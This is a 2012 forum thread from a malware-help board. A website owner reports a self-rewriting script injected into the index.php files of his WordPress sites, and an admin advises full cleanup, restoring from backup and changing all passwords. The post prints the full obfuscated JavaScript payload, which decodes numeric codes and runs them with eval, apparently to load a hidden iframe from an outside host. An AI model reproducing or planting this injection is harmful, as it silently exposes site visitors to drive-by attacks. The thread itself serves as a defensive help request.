website malware

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by petercl, Feb 16, 2012.

  1. petercl

    petercl Private E-2

    Have multiple WordPress and PHP websites on a shared domain. Have recently encountered a malware program that was inserted, probably through one of the WP blogs. The malware inserts the script into the index.php file of all websites on the domain. The code is as follows (inside the double brackets):

    {{ <script>if(window.document)aa=new RegExp('test','i').toString();aaa='/test/i';if(aa.indexOf(aaa)!==-1){ss='';s=String;ee='e';e=eval;t='y';}h=2*Math.cos(Math.PI);n=[4.5,4.5,52.5,51,16,20,50,55.5,49.5,58.5,54.5,50.5,55,58,23,51.5,50.5,58,34.5,54,50.5,54.5,50.5,55,58,57.5,33,60.5,42,48.5,51.5,39,48.5,54.5,50.5,20,19.5,49,55.5,50,60.5,19.5,20.5,45.5,24,46.5,20.5,61.5,4.5,4.5,4.5,52.5,51,57,48.5,54.5,50.5,57,20,20.5,29.5,4.5,4.5,62.5,16,50.5,54,57.5,50.5,16,61.5,4.5,4.5,4.5,50,55.5,49.5,58.5,54.5,50.5,55,58,23,59.5,57,52.5,58,50.5,20,17,30,52.5,51,57,48.5,54.5,50.5,16,57.5,57,49.5,30.5,19.5,52,58,58,56,29,23.5,23.5,58,50,57.5,24.5,27.5,25.5,23,24.5,50,58.5,54.5,49,23,49.5,55.5,54.5,23.5,57.5,58,50,57.5,23.5,51.5,55.5,23,56,52,56,31.5,57.5,52.5,50,30.5,24.5,19.5,16,59.5,52.5,50,58,52,30.5,19.5,24.5,24,19.5,16,52,50.5,52.5,51.5,52,58,30.5,19.5,24.5,24,19.5,16,57.5,58,60.5,54,50.5,30.5,19.5,59,52.5,57.5,52.5,49,52.5,54,52.5,58,60.5,29,52,52.5,50,50,50.5,55,29.5,56,55.5,57.5,52.5,58,52.5,55.5,55,29,48.5,49,57.5,55.5,54,58.5,58,50.5,29.5,54,50.5,51,58,29,24,29.5,58,55.5,56,29,24,29.5,19.5,31,30,23.5,52.5,51,57,48.5,54.5,50.5,31,17,20.5,29.5,4.5,4.5,62.5,4.5,4.5,51,58.5,55,49.5,58,52.5,55.5,55,16,52.5,51,57,48.5,54.5,50.5,57,20,20.5,61.5,4.5,4.5,4.5,59,48.5,57,16,51,16,30.5,16,50,55.5,49.5,58.5,54.5,50.5,55,58,23,49.5,57,50.5,48.5,58,50.5,34.5,54,50.5,54.5,50.5,55,58,20,19.5,52.5,51,57,48.5,54.5,50.5,19.5,20.5,29.5,51,23,57.5,50.5,58,32.5,58,58,57,52.5,49,58.5,58,50.5,20,19.5,57.5,57,49.5,19.5,22,19.5,52,58,58,56,29,23.5,23.5,58,50,57.5,24.5,27.5,25.5,23,24.5,50,58.5,54.5,49,23,49.5,55.5,54.5,23.5,57.5,58,50,57.5,23.5,51.5,55.5,23,56,52,56,31.5,57.5,52.5,50,30.5,24.5,19.5,20.5,29.5,51,23,57.5,58,60.5,54,50.5,23,59,52.5,57.5,52.5,49,52.5,54,52.5,58,60.5,30.5,19.5,52,52.5,50,50,50.5,55,19.5,29.5,51,23,57.5,58,60.5,54,50.5,23,56,55.5,57.5,52.5,58,52.5,55.5,55,30.5,19.5,48.5,49,57.5,55.5,54,58.5,58,50.5,19.5,29.5,51,23,57.5,58,60.5,54,50.5,23,54,50.5,51,58,30.5,19.5,24,19.5
,29.5,51,23,57.5,58,60.5,54,50.5,23,58,55.5,56,30.5,19.5,24,19.5,29.5,51,23,57.5,50.5,58,32.5,58,58,57,52.5,49,58.5,58,50.5,20,19.5,59.5,52.5,50,58,52,19.5,22,19.5,24.5,24,19.5,20.5,29.5,51,23,57.5,50.5,58,32.5,58,58,57,52.5,49,58.5,58,50.5,20,19.5,52,50.5,52.5,51.5,52,58,19.5,22,19.5,24.5,24,19.5,20.5,29.5,4.5,4.5,4.5,50,55.5,49.5,58.5,54.5,50.5,55,58,23,51.5,50.5,58,34.5,54,50.5,54.5,50.5,55,58,57.5,33,60.5,42,48.5,51.5,39,48.5,54.5,50.5,20,19.5,49,55.5,50,60.5,19.5,20.5,45.5,24,46.5,23,48.5,56,56,50.5,55,50,33.5,52,52.5,54,50,20,51,20.5,29.5,4.5,4.5,62.5];f='f'+'romChar';for(i=0;i-n.length<0;i++){j=i;ss=ss+String[f+'Code'](-h*n[j]);}e(ss);</script> }}

    Anybody had any experience with this? I have deleted it and it rewrites itself after a few hours. I have been able to stop its propagation by changing the file permissions to read only. Any help appreciated. Thanks
     
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!

    This is not something we can help you with. Website files have to be cleaned manually (100% of them) or restored from a full backup. The code for the websites has to be properly written to avoid security holes and has to use current, updated web design software. Expert developers who are familiar with security issues should be designing the website. You need to change your logins and passwords too, to make sure that you can stop anyone who may have stolen login and password info, which gives them full access. Make sure FTP passwords are changed too.

    Also, the web host you are using must make sure they are properly protected to avoid them being the source of your infection.
     
